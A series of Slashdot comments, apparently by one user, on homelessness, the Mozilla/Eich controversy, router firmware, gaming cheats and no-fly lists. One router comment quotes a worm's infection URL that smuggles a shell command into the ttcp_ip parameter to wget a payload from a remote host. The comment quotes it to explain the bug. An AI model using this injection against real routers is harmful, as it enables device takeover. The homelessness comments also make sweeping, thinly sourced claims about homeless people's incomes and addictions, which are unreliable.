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Comment Re:Millionare panhandlers (Score 4, Interesting) 200

While you can rile on religion, there are numerous statistics that show that religion and spiritual beliefs help with drug addiction and alcoholism[1] [2]--main items preventing the chronic homeless from reintegrating with society. This is why the religious shelters push religion so hard. The goal in these shelters isn't just to provide a bed, but to get the person to overcome the conditions in themselves that prevent them from leaving homeless life.

Nearly all chronic homeless have dreams of a better life, but almost none of them have goals to achieve their dreams, and are stuck in the homeless life. Is trying to give homeless people the tools they need to achieve their dreams "evil"?

The real tragedies in shelters is the rate of rape and violence, which is especially true in (underfunded) public teen shelters. These shelters house hundreds of mentally ill or drug addicted people, who frequently rape others. Most of the homeless people I've run into (who live in a hard life--hearing gunshots nightly) refuse to go anywhere near the public shelters because of fear of their safety. That's how bad they are--that's where the real evil is.

[1] It was concluded that among this sample of Scottish post-secondary students, having a strong religious commitment was associated with less substance use and that heavy drinking and using tobacco was correlated with illicit drug use.
[2] The one-third of prison inmates who participate in religious activities exhibit lower rates of recidivismand recidivism is due almost entirely to drug and alcohol abuse.

Teens who do not consider religious beliefs important are almost three times more likely to drink, binge-drink and smoke, almost four times likelier to use marijuana and seven times likelier to use illicit drugs than teens who believe that religion is important.

Comment Re:Millionare panhandlers (Score 3, Interesting) 200

The vast majority of chronic homeless people (stunk, dirty, massive backpacks) have drug addiction and/or mental illness[3]. They also make a boatload of money (often > $100,000/yr). The problem is that they lack the skills necessary to effectively use that money and reintegrate to normal society, so they're relegated to homeless life. Homeless life isn't easy either--most of them have either been around someone who's been shot, or been shot themselves. Rape is prevalent, for both genders, but especially women. [2] Life expectancy is not good[1]. In talking to hundreds of homeless people, I have only met one homeless person who was there by choice.

Having a Starbucks cup doesn't mean that they have piles of money. It means they received > $4 in donations recently and were able to spend it. The money they earn usually quickly goes to drugs, alcohol, theft, or impulse purchases. This is why it's so key to NOT give them money. You or I would be smart enough to put the money in a bank, save, and get back on our feet. They can't (or they would have already done so).

When I walk down the street and run into a homeless person begging, I offer to take them to a nearby fast-food restaurant. About 50% decline, and the other 50% are immensely grateful. That allows you to engage them in conversation, and offer them to take up a rehab program, which can teach them to break their addictions and gain the life skills they need to become part of society again.

[1] young homeless women are four to 31 times as likely to die early as housed young women (O’Connell, 2005)

[2] In yet another study, 9% of homeless women reported at least one experience of sexual victimization in the last month

[3] According to Didenko and Pankratz (2007), two-thirds of homeless people report that drugs and/or alcohol were a major reason for their becoming homeless.

Comment Re:Biden is talking coding?? (Score 1) 225


He's not wasting his time. This is the first time I've EVER seen a rebuttal to the common Al Gore "internet" quote, and it completely changed my perspective on the whole issue. I am now very thankful for Al Gore's involvement in the internet as a whole, and have significantly more respect for his future vision.

He's also been completely correct on global warming--a topic I did not accept as fact during his VP term.

Comment Re:Will it run on my WRT54G? (Score 1) 71

I run Toastman's build of Tomato on RT-N66Us. I have 6 of them in various environments, from 6 months to 2 years deployed, and not a single lockup in prod operation. I achieve rates of 150Mb/s wired and 30-50Mb/s wireless. While speeds are not great, I'm mainly after features, stability, and the bandwidth monitor--and these are plenty faster than my ISP. These are dual-band as well, which is useful as one of the environments I'm in has a completely saturated 2.4 GHZ spectrum.

I have had stability problems in Toastman Tomato when I enable IPv6, but I expect that's either me doing something wrong, or a firmware issue, not a hardware issue.

The ASUS routers also have a CFE (bios, kinda) which allows reflashing, which means they're almost impossible to brick. Highly recommend.

The RT-AC66U is much faster than the RT-N66U, but I haven't had much experience with it. Shibby Tomato does support it now.

Comment Re:I May Not Agree (Score 4, Insightful) 1116

Cmon Grateful... Under what basis do you qualify Eich as a bigot?

"having or revealing an obstinate belief in the superiority of one's own opinions and a prejudiced intolerance of the opinions of others."

Eich's statement shows ultimate tolerance of the opinions of others. He promises to treat others as equal, continue to work with the LGBT community, continue the non-discrimination policy, equal health benefits, etc, etc. His tolerance is shown clearly: he doesn't agree with gay marriage, but commits to treating all of his employees as human beings. Others at Mozilla that worked with him were shocked to find out he contributed to Prop 8, because they had never seen him treat anyone with inequality. All of the facts, both from himself and others, have shown a full commitment to treat others with respect.

Eich's statement:
I ask for your ongoing help to make Mozilla a place of equality and welcome for all. Here are my commitments, and here’s what you can expect:

Active commitment to equality in everything we do, from employment to events to community-building.
Working with LGBT communities and allies, to listen and learn what does and doesn’t make Mozilla supportive and welcoming.
My ongoing commitment to our Community Participation Guidelines, our inclusive health benefits, our anti-discrimination policies, and the spirit that underlies all of these.

My personal commitment to work on new initiatives to reach out to those who feel excluded or who have been marginalized in ways that makes their contributing to Mozilla and to open source difficult. More on this last item below.

I know some will be skeptical about this, and that words alone will not change anything. I can only ask for your support to have the time to “show, not tell”; and in the meantime express my sorrow at having caused pain.[1]

“That was shocking to me, because I never saw any kind of behavior or attitude from him that was not in line with Mozilla’s values of inclusiveness,” (Mitchell Baker-Chairperson of Mozilla) [2]

This is not the statement of a bigot. Silencing, attacking, and treating his political views as invalid is bigoted.

Without a difference of opinion, you cannot have tolerance. A monoculture has no room for tolerance. Why the heck is disagreement these days automatically "bigotry" and why do people see love as "accepting all opinions that another holds"? Why would it be "shocking" that someone could treat others with respect, but disagree on a political issue?

[1] https://brendaneich.com/2014/0...
[2] https://blog.lizardwrangler.co... (note: this post appears to have been taken down on her blog, or archived, but it's still widely quoted on the internet)

Comment Everything is watching you these days... (Score 5, Informative) 208

The craziest thing in the article that I saw was that Tesla contacted him to tell him he couldn't do that on his car, or it'd void his warranty. Not only is he not allowed to reverse engineer how his car works, they're apparently watching his car at all times.

It won't be long before people will know what we do, 24/7.

Comment Re:I think this is bullshit (Score 1, Troll) 1746

Prop 8 support is not a "hate" group. The vast majority of individuals that supported it do not hate LGBTIQ individuals, and it's pretty clear from the various posts from those inside Mozilla (both for and against his resignation) that Eich doesn't either. They simply believe the government should not grant marriage licenses for non-heterosexual relationships.

Hate has a specific meaning: intense or passionate dislike. Recently, it appears that any opposition to one's views, if it removes a perceived or actual human right, is automatically hate. This seems especially true for this issue, and it's very wrong. Those groups which ARE hate groups (Westboro Baptist) should be labeled as such. Labeling all groups as hate groups destroys the meaning of the word and alienates any discussion between people on the topic.

Other examples:
You hate life because you are okay with murdering babies.
You hate me because you're invading my personal rights between me and my doctor.

Comment Re:How common is cheating with VAC? (Score 2) 511

When I was in college, my friend had a roommate who played CS nearly all the time. His roommate actually failed out of college because all he did was CS.

While I think most of your points stand, I can say with 100% certainty that he acted like he could see through walls. He was so good that he routinely killed people (with headshots, even) through walls. Had I not seen his monitor with my own eyes, I would have known he was cheating. He was frequently accused of cheating. In fact, he could only play on his clan's server because he'd get banned nearly everywhere else. He'd routinely go 51/2 K/D in a match. Sometimes when we played with him, we would all have to reassure people that he wasn't cheating by vouching for him.

Just something to think about before anyone accuses a really elite play of hacking. What they can accomplish is rather insane.

Comment Re:Still abusive (Score 1) 511

I think this was a bug. I too, experienced this behavior in the past, but on my recent travels, even when I've forgotten to put it in offline mode, I was able to play with it starting in offline mode.

While that bug was annoying, I believe it's been resolved, and you won't find this is a problem anymore. I haven't found it to be in the last 2 months.

Comment Re:Default firmware only? (Score 4, Informative) 134

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

Comment Re:I was on that list too... (Score 4, Interesting) 239

Because the "redress list" is for people who have a name which matches a suspected or known terrorist on the "no fly" list. In other words, (s)he wasn't on the "no fly" list, but (s)he was unfortunate enough to have the same name as someone who is. Since the "no fly" list is keyed by names and not an actual unique identifier, you can be "on" the list even though you're not.

This is much different than Dr. Rahinah Ibrahim, who was actually on the no fly list. While other Rahinah Ibrahim's would have been able to (and possibly would need to) get a redress number, she would be unable to obtain one.


Comment Re:Here's some options... (Score 1) 526

Or how about just buy some replacement speakers and install them? They're $8 on ebay, and most people on Slashdot have the skills to do so. Hell, there's tons of youtube tutorials on how to fix your computer.

If you want to stick it to Dell (because they ARE responsible), then by all means, take them to small claims court. But instead of building a time machine, hiring a lawyer, or getting all angry, mad, and ruining your day (if you're not going to sue)... just pay the $8 and get replacement speakers on ebay, or use external desktop speakers.... and install the BIOS update that prevents the issue in the future.


Comment Re:Cost? (Score 2) 310

Install asusWRT or Tomato...

I use Tomato from Toastman on mine (RT-N66U) and it's been rock solid stable for over a year now. Note: Tomato doesn't currently work on all variants--specifically the AC66U and AC68U because it requires a MIPS processor.

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